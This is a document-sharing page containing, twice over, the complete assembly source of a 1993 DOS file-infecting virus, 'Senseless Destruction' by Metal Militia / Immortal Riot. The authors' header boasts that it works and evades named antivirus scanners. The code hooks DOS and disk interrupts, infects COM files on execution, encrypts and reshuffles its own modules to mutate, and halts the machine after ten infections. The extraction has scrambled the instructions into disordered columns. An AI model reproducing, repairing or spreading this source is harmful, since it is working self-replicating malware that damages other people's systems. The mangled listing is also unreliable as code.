Destruct
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Destruct as PDF for free.
More details
- Words: 1,538
- Pages: 10
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
virusname: country : author : date :
senseless destruction sweden metal militia / immortal riot 07-22-1993
this is an mutation of bad-boy from 'unknown'. many thanks to the scratch coder of bad-boy... we've tried this virus ourself, and it works just fine. it uses the tsr, is non-overwriting, and may halt the system. command files increase by 1069 bytes. originally from europe discovered in 1991. this is the second mutation of the bad boy virus, the first mutation was found in bulgaria. mcafee scan v105 can't find it, and s&s toolkit 6.5 don't find it either. i haven't tried with scanners like fprot/tbscan, but they will probably report some virus structure. best regards : [metal militia] [the unforgiven]
code
start:
segment assume cs:code,ds:code .radix 16 org 100 push word ptr cs:[tabb+2] push cs pop ds jmp loopshit
otto: loopshit: curofs files fsize ftime fdate stdint21 oldint13 oldint21 oldint24
jmp
start
jmp
word ptr cs:[tabb]
dw ? db 0 dw 2 dw ? dw ? dd ? dd ? dd ? dd ?
;number of infected files from this copy ;size of infected file
;------------- table with module parameters -------------------tabb : dw offset false_mod_1 ;00 dw offset mod_2 ;02 dw offset mod_3 ;04 dw offset mod_4 ;06 ;offset modules dw offset mod_5 ;08 dw offset mod_6 ;0a dw offset mod_7 ;0c dw offset mod_8 ;0e
dw dw dw dw dw dw dw dw
offset offset offset offset offset offset offset offset
mod_2 mod_3 mod_4 mod_5 mod_6 mod_7 mod_8 myend
-
offset offset offset offset offset offset offset offset
mod_1;10 mod_2;12 mod_3;14 mod_4;16 mod_5;18 ;size modules mod_6;1a mod_7;1c mod_8;1e
;------------- module - 1 - coder/decoder ---------------------mod_1: mov bx,offset tabb+2 ;first module to working (module 2) mov cx,6 ;number of modules to working mod_1_lp1: cmp bx,offset tabb+0a jne mod_1_cont add bx,2 mod_1_cont: push bx push cx mov ax,[bx] ;ax - offset module mov cx,[bx+10] ;cx - size of module mov bx,ax mod_1_lp2: xor byte ptr [bx],al inc bx loop mod_1_lp2 pop cx pop bx add bx,2 loop mod_1_lp1 ret ;------------- module - 2 - mutation to memory ----------------mod_2: ;instalation check mov mov mov mov repe jne jmp
es,cs:[2] ;memory size di,100 si,100 cx,0bh cmpsb mod_2_install ;jump if not install word ptr cs:[tabb+06] ;if install, jump to module 4
mod_2_install: ;instalation mov dec mov
ax,cs ax ds,ax
cmp je
byte ptr ds:[0],'z' mod_2_cont
jmp
word ptr cs:[tabb+6]
;if no last mcb - go to mod4
mod_2_cont: sub mov sub mov mov push pop mod_2_mut: mov
word ptr ds:[3],0c0 ax,es ax,0c0 es,ax word ptr ds:[12],ax cs ds
;decrement memory size with 2k
byte ptr cs:files,0
mov mov mov rep
di,100 cx,offset mod_1-100 si,100 movsb ;write table to new memory
mov add xor
bx,word ptr cs:[tabb] bx,offset mod_1_lp2-offset mod_1+1 byte ptr [bx],18 ;change code method
mov mov mod_2_lp1: push call push mov push add mov pop pop xchg mov rep xchg mov or pop loop mov not mov mod_2_lp2: and add loop jmp mod_2_rnd: push push xor mov mod_2_lp3:
cx,8 word ptr curofs,offset mod_1 cx mod_2_rnd ;generate random module addres bx ;addres in table returned from mod_2_rnd ax,[bx] ;offset module ax bx,10 cx,[bx] ;length of module si bx di,curofs word ptr es:[bx],di ;change module offset in table movsb ;copy module to new memory di,curofs ;change current offset in new memory ax,8000 word ptr [bx],ax ;mark module - used cx mod_2_lp1 cl,8 ax bx,offset tabb word ptr [bx],ax bx,2 mod_2_lp2 word ptr cs:[tabb+4] cx es cx,cx es,cx
;unmark all modules
;go to module 3
mov bx,es:[46c] db 81,0e3,07,00 ;and bx,7 shl bx,1 add bx,offset tabb test [bx],8000 jnz mod_2_lp3 pop es pop cx ret ;------------- module - 3 - set interrupt vectors --------------mod_3: xor ax,ax mov ds,ax mov mov mov mov
ax,ds:[4*21] word ptr es:[oldint21],ax ax,ds:[4*21+2] word ptr es:[oldint21+2],ax
mov int cmp jne
ah,30 21 ax,1e03 mod_3_getvec
mov mov push int mov pop jmp
word ptr es:[stdint21],1460 ax,1203 ds 2f word ptr es:[stdint21+2],ds ds mod_3_setvec
mod_3_getvec: mov mov mov mov mod_3_setvec: cli mov mov mov mov sti
ax,ds:[4*21] word ptr es:[stdint21],ax ax,ds:[4*21+2] word ptr es:[stdint21+2],ax
ax,word ptr es:[tabb+0c] ds:[4*21],ax ax,es ds:[4*21+2],ax
mov mov int push mov mov mov pop int
cx,es ah,13 2f ; es ; es,cx word ptr word ptr es ; 2f ;
jmp
word ptr cs:[tabb+06]
; ; es:[oldint13],dx ; get standart int13 addres es:[oldint13+2],ds ;
;go to module 4
;------------- module - 4 - restore old program code & start ---mod_4: push cs push cs pop ds pop es mov si,word ptr cs:[tabb+06] add si,offset mod_4_cont - offset mod_4 mov di,cs:fsize add di,offset myend+1 push di mov cx,offset mod_5 - offset mod_4_cont cld rep movsb ret mod_4_cont: mov si,cs:fsize add si,100 cmp jnc mov mod_4_cnt: mov mov rep mov push ret
si,offset myend+1 mod_4_cnt si,offset myend+1 di,100 cx,offset myend-100 movsb ax,100 ; ax ; jmp 100 ;
;------------- module - 5 - special program --------------------mod_5: mov ah,9 mov dx,word ptr [tabb+8] add dx,offset msg-offset mod_5 push cs pop ds int 21 cli hlt msg
db
0dh,0a,'senseless destruction...',7,7,'$'
;------------- module - 6 - int 24 header ----------------------mod_6: mov al,3 iret db 'protecting what we are ',0 db 'joining together to take on the world.. ',0 db 'metal militia [imm0rtal ri0t] ',0
;------------- module - 7 - int 21 header ----------------------mod_7: push bx
push push push push
si di es ax
cmp je
ax,4b00 mod_7_begin jmp mod_7_exit
mod_7_begin: push push pop xor mov mov mov movsw movsw mov cli mov mov mov sti pop
ds cs ; es ; ax,ax ; ds,ax ; si,4*24 ; di,offset oldint24 ; ; change int24 vector ; ax,word ptr cs:[tabb+0a] ; ; ds:[4*24],ax ; ax,cs ; ds:[4*24+2],ax ; ds
mov ax,3d00 ; pushf ; call cs:oldint21 ; jc mod_7_ex ; open,infect,close file mov bx,ax ; mod_7_infect: ; call word ptr cs:[tabb+0e] ; pushf mov ah,3e ; pushf ; call cs:oldint21 ; popf jc mod_7_ex
mod_7_ex:
push cli xor mov mov xchg mov mov xchg mov sti pop
ds
; ;
push xor mov mov mov
ds ; ax,ax ds,ax ax,word ptr cs:oldint24 ds:[4*24],ax
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; exchange int13 vectors ax,word ptr cs:[oldint13+2] ; ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ; ; ; ;
;
mov mov pop
ax,word ptr cs:oldint24+2 ds:[4*24+2],ax ds ;
pop pop pop pop pop
ax es di si bx
jmp
cs:oldint21
; restore int24 vector ;
mod_7_exit:
;------------- module - 8 - infecting (bx - file handle) -------mod_8: push cx push dx push ds push es push di push bp push mov int mov xor mov int pop
bx ax,1220 2f bl,es:[di] bh,bh ax,1216 2f bx
mov cmp jc jmp
ax,word ptr es:[di+11] ax,0f000 mod_8_c mod_8_exit
mov
word ptr es:[di+2],2
mov mov
ax,es:[di+11] cs:fsize,ax
mov mov mov mov
ax,word ptr es:[di+0dh] word ptr cs:[ftime],ax ax,word ptr es:[di+0f] word ptr cs:[fdate],ax
push pop mov mov mov pushf call jnc jmp
cs ; ds ; dx,offset myend+1 cx,offset myend-100 ah,3f
mod_8_c:
mod_8_cnt:
cs:oldint21 mod_8_cnt mod_8_exit
;open mode - r/w ; save file size ; ; save file date/time ; ;
; ; read first bytes ;
mov mov mov cmp jne jmp mod_8_nxtchk: xchg cmp jne jmp
bp,ax si,dx ax,'mz' ax,word ptr ds:[si] mod_8_nxtchk mod_8_exit
; ax - bytes read
ah,al ax,ds:[si] mod_8_cnt2 mod_8_exit
mod_8_cnt2:
mod_8_cnt1:
push push push pop mov mov mov repe pop pop jne jmp
es di cs es si,100 di,dx cx,0bh cmpsb di es mod_8_cnt1 mod_8_exit
mov
word ptr es:[di+15],0
push push mov add xor push pop mov cld rep pop pop
es di si,word ptr cs:[tabb+0e] si,offset mod_8_cont - offset mod_8 di,di cs es cx,offset mod_8_cont_end - offset mod_8_cont
mov add push xor push
si,word ptr cs:[tabb+0e] si,offset mod_8_cont_end - offset mod_8 si si,si si
push cli xor mov mov xchg mov mov xchg mov sti
ds
; ; ; ; check for infected file ; ; ; ; fp:=0
movsb di es
; ;
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; ax,word ptr cs:[oldint13+2] ; exchange int13 vectors ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ;
pop
ds
;
ret mod_8_cont: push call pop
bx word ptr cs:[tabb] bx
mov mov mov pushf call
dx,100 ah,40 cx,offset myend-0ff ; cs:stdint21
pushf push call pop popf jnc pop mov add push ret mod_8_cont1: mov mov mov mov mov pushf call
bx word ptr cs:[tabb] bx
; code virus ; ; write code in begin ;
; decode virus
mod_8_cont1 ax ax,word ptr cs:[tabb+0e] ax,offset mod_8_ext - offset mod_8 ax ax,es:[di+11] ; fp:=end of file word ptr es:[di+15],ax ; dx,offset myend+1 cx,bp ah,40
; bp - files read ; ;
cs:stdint21
; write in end of file
ret mod_8_cont_end: mov mov mov pushf call
mod_8_exit: mod_8_ext: mod_8_ex:
ax,5701 cx,cs:ftime dx,cs:fdate ; cs:oldint21
; ; ; restore file date/time ;
inc cmp jne call jmp
cs:files cs:files,0a mod_8_ext word ptr cs:[tabb+8] short mod_8_ext
stc jmp
short mod_8_ex
clc pop pop
bp di
pop pop pop pop ret
es ds dx cx
;--------------------------------------------------------------myend
db int
false_mod_1: mov ret code #
0 20
;code of infected file
word ptr cs:[tabb],offset mod_1
ends end start
virusname: country : author : date :
senseless destruction sweden metal militia / immortal riot 07-22-1993
this is an mutation of bad-boy from 'unknown'. many thanks to the scratch coder of bad-boy... we've tried this virus ourself, and it works just fine. it uses the tsr, is non-overwriting, and may halt the system. command files increase by 1069 bytes. originally from europe discovered in 1991. this is the second mutation of the bad boy virus, the first mutation was found in bulgaria. mcafee scan v105 can't find it, and s&s toolkit 6.5 don't find it either. i haven't tried with scanners like fprot/tbscan, but they will probably report some virus structure. best regards : [metal militia] [the unforgiven]
code
start:
segment assume cs:code,ds:code .radix 16 org 100 push word ptr cs:[tabb+2] push cs pop ds jmp loopshit
otto: loopshit: curofs files fsize ftime fdate stdint21 oldint13 oldint21 oldint24
jmp
start
jmp
word ptr cs:[tabb]
dw ? db 0 dw 2 dw ? dw ? dd ? dd ? dd ? dd ?
;number of infected files from this copy ;size of infected file
;------------- table with module parameters -------------------tabb : dw offset false_mod_1 ;00 dw offset mod_2 ;02 dw offset mod_3 ;04 dw offset mod_4 ;06 ;offset modules dw offset mod_5 ;08 dw offset mod_6 ;0a dw offset mod_7 ;0c dw offset mod_8 ;0e
dw dw dw dw dw dw dw dw
offset offset offset offset offset offset offset offset
mod_2 mod_3 mod_4 mod_5 mod_6 mod_7 mod_8 myend
-
offset offset offset offset offset offset offset offset
mod_1;10 mod_2;12 mod_3;14 mod_4;16 mod_5;18 ;size modules mod_6;1a mod_7;1c mod_8;1e
;------------- module - 1 - coder/decoder ---------------------mod_1: mov bx,offset tabb+2 ;first module to working (module 2) mov cx,6 ;number of modules to working mod_1_lp1: cmp bx,offset tabb+0a jne mod_1_cont add bx,2 mod_1_cont: push bx push cx mov ax,[bx] ;ax - offset module mov cx,[bx+10] ;cx - size of module mov bx,ax mod_1_lp2: xor byte ptr [bx],al inc bx loop mod_1_lp2 pop cx pop bx add bx,2 loop mod_1_lp1 ret ;------------- module - 2 - mutation to memory ----------------mod_2: ;instalation check mov mov mov mov repe jne jmp
es,cs:[2] ;memory size di,100 si,100 cx,0bh cmpsb mod_2_install ;jump if not install word ptr cs:[tabb+06] ;if install, jump to module 4
mod_2_install: ;instalation mov dec mov
ax,cs ax ds,ax
cmp je
byte ptr ds:[0],'z' mod_2_cont
jmp
word ptr cs:[tabb+6]
;if no last mcb - go to mod4
mod_2_cont: sub mov sub mov mov push pop mod_2_mut: mov
word ptr ds:[3],0c0 ax,es ax,0c0 es,ax word ptr ds:[12],ax cs ds
;decrement memory size with 2k
byte ptr cs:files,0
mov mov mov rep
di,100 cx,offset mod_1-100 si,100 movsb ;write table to new memory
mov add xor
bx,word ptr cs:[tabb] bx,offset mod_1_lp2-offset mod_1+1 byte ptr [bx],18 ;change code method
mov mov mod_2_lp1: push call push mov push add mov pop pop xchg mov rep xchg mov or pop loop mov not mov mod_2_lp2: and add loop jmp mod_2_rnd: push push xor mov mod_2_lp3:
cx,8 word ptr curofs,offset mod_1 cx mod_2_rnd ;generate random module addres bx ;addres in table returned from mod_2_rnd ax,[bx] ;offset module ax bx,10 cx,[bx] ;length of module si bx di,curofs word ptr es:[bx],di ;change module offset in table movsb ;copy module to new memory di,curofs ;change current offset in new memory ax,8000 word ptr [bx],ax ;mark module - used cx mod_2_lp1 cl,8 ax bx,offset tabb word ptr [bx],ax bx,2 mod_2_lp2 word ptr cs:[tabb+4] cx es cx,cx es,cx
;unmark all modules
;go to module 3
mov bx,es:[46c] db 81,0e3,07,00 ;and bx,7 shl bx,1 add bx,offset tabb test [bx],8000 jnz mod_2_lp3 pop es pop cx ret ;------------- module - 3 - set interrupt vectors --------------mod_3: xor ax,ax mov ds,ax mov mov mov mov
ax,ds:[4*21] word ptr es:[oldint21],ax ax,ds:[4*21+2] word ptr es:[oldint21+2],ax
mov int cmp jne
ah,30 21 ax,1e03 mod_3_getvec
mov mov push int mov pop jmp
word ptr es:[stdint21],1460 ax,1203 ds 2f word ptr es:[stdint21+2],ds ds mod_3_setvec
mod_3_getvec: mov mov mov mov mod_3_setvec: cli mov mov mov mov sti
ax,ds:[4*21] word ptr es:[stdint21],ax ax,ds:[4*21+2] word ptr es:[stdint21+2],ax
ax,word ptr es:[tabb+0c] ds:[4*21],ax ax,es ds:[4*21+2],ax
mov mov int push mov mov mov pop int
cx,es ah,13 2f ; es ; es,cx word ptr word ptr es ; 2f ;
jmp
word ptr cs:[tabb+06]
; ; es:[oldint13],dx ; get standart int13 addres es:[oldint13+2],ds ;
;go to module 4
;------------- module - 4 - restore old program code & start ---mod_4: push cs push cs pop ds pop es mov si,word ptr cs:[tabb+06] add si,offset mod_4_cont - offset mod_4 mov di,cs:fsize add di,offset myend+1 push di mov cx,offset mod_5 - offset mod_4_cont cld rep movsb ret mod_4_cont: mov si,cs:fsize add si,100 cmp jnc mov mod_4_cnt: mov mov rep mov push ret
si,offset myend+1 mod_4_cnt si,offset myend+1 di,100 cx,offset myend-100 movsb ax,100 ; ax ; jmp 100 ;
;------------- module - 5 - special program --------------------mod_5: mov ah,9 mov dx,word ptr [tabb+8] add dx,offset msg-offset mod_5 push cs pop ds int 21 cli hlt msg
db
0dh,0a,'senseless destruction...',7,7,'$'
;------------- module - 6 - int 24 header ----------------------mod_6: mov al,3 iret db 'protecting what we are ',0 db 'joining together to take on the world.. ',0 db 'metal militia [imm0rtal ri0t] ',0
;------------- module - 7 - int 21 header ----------------------mod_7: push bx
push push push push
si di es ax
cmp je
ax,4b00 mod_7_begin jmp mod_7_exit
mod_7_begin: push push pop xor mov mov mov movsw movsw mov cli mov mov mov sti pop
ds cs ; es ; ax,ax ; ds,ax ; si,4*24 ; di,offset oldint24 ; ; change int24 vector ; ax,word ptr cs:[tabb+0a] ; ; ds:[4*24],ax ; ax,cs ; ds:[4*24+2],ax ; ds
mov ax,3d00 ; pushf ; call cs:oldint21 ; jc mod_7_ex ; open,infect,close file mov bx,ax ; mod_7_infect: ; call word ptr cs:[tabb+0e] ; pushf mov ah,3e ; pushf ; call cs:oldint21 ; popf jc mod_7_ex
mod_7_ex:
push cli xor mov mov xchg mov mov xchg mov sti pop
ds
; ;
push xor mov mov mov
ds ; ax,ax ds,ax ax,word ptr cs:oldint24 ds:[4*24],ax
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; exchange int13 vectors ax,word ptr cs:[oldint13+2] ; ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ; ds ; ; ; ;
;
mov mov pop
ax,word ptr cs:oldint24+2 ds:[4*24+2],ax ds ;
pop pop pop pop pop
ax es di si bx
jmp
cs:oldint21
; restore int24 vector ;
mod_7_exit:
;------------- module - 8 - infecting (bx - file handle) -------mod_8: push cx push dx push ds push es push di push bp push mov int mov xor mov int pop
bx ax,1220 2f bl,es:[di] bh,bh ax,1216 2f bx
mov cmp jc jmp
ax,word ptr es:[di+11] ax,0f000 mod_8_c mod_8_exit
mov
word ptr es:[di+2],2
mov mov
ax,es:[di+11] cs:fsize,ax
mov mov mov mov
ax,word ptr es:[di+0dh] word ptr cs:[ftime],ax ax,word ptr es:[di+0f] word ptr cs:[fdate],ax
push pop mov mov mov pushf call jnc jmp
cs ; ds ; dx,offset myend+1 cx,offset myend-100 ah,3f
mod_8_c:
mod_8_cnt:
cs:oldint21 mod_8_cnt mod_8_exit
;open mode - r/w ; save file size ; ; save file date/time ; ;
; ; read first bytes ;
mov mov mov cmp jne jmp mod_8_nxtchk: xchg cmp jne jmp
bp,ax si,dx ax,'mz' ax,word ptr ds:[si] mod_8_nxtchk mod_8_exit
; ax - bytes read
ah,al ax,ds:[si] mod_8_cnt2 mod_8_exit
mod_8_cnt2:
mod_8_cnt1:
push push push pop mov mov mov repe pop pop jne jmp
es di cs es si,100 di,dx cx,0bh cmpsb di es mod_8_cnt1 mod_8_exit
mov
word ptr es:[di+15],0
push push mov add xor push pop mov cld rep pop pop
es di si,word ptr cs:[tabb+0e] si,offset mod_8_cont - offset mod_8 di,di cs es cx,offset mod_8_cont_end - offset mod_8_cont
mov add push xor push
si,word ptr cs:[tabb+0e] si,offset mod_8_cont_end - offset mod_8 si si,si si
push cli xor mov mov xchg mov mov xchg mov sti
ds
; ; ; ; check for infected file ; ; ; ; fp:=0
movsb di es
; ;
ax,ax ; ds,ax ; ax,word ptr cs:[oldint13] ; ax,word ptr ds:[4*13] ; word ptr cs:[oldint13],ax ; ax,word ptr cs:[oldint13+2] ; exchange int13 vectors ax,word ptr ds:[4*13+2] ; word ptr cs:[oldint13+2],ax ; ;
pop
ds
;
ret mod_8_cont: push call pop
bx word ptr cs:[tabb] bx
mov mov mov pushf call
dx,100 ah,40 cx,offset myend-0ff ; cs:stdint21
pushf push call pop popf jnc pop mov add push ret mod_8_cont1: mov mov mov mov mov pushf call
bx word ptr cs:[tabb] bx
; code virus ; ; write code in begin ;
; decode virus
mod_8_cont1 ax ax,word ptr cs:[tabb+0e] ax,offset mod_8_ext - offset mod_8 ax ax,es:[di+11] ; fp:=end of file word ptr es:[di+15],ax ; dx,offset myend+1 cx,bp ah,40
; bp - files read ; ;
cs:stdint21
; write in end of file
ret mod_8_cont_end: mov mov mov pushf call
mod_8_exit: mod_8_ext: mod_8_ex:
ax,5701 cx,cs:ftime dx,cs:fdate ; cs:oldint21
; ; ; restore file date/time ;
inc cmp jne call jmp
cs:files cs:files,0a mod_8_ext word ptr cs:[tabb+8] short mod_8_ext
stc jmp
short mod_8_ex
clc pop pop
bp di
pop pop pop pop ret
es ds dx cx
;--------------------------------------------------------------myend
db int
false_mod_1: mov ret code #
0 20
;code of infected file
word ptr cs:[tabb],offset mod_1
ends end start
Related Documents
Destruct
November 2019 18
Destruct Or For Karen
October 2019 49
How To Self Destruct Intro
April 2020 4
Meta-tribes #5 Self Destruct
May 2020 3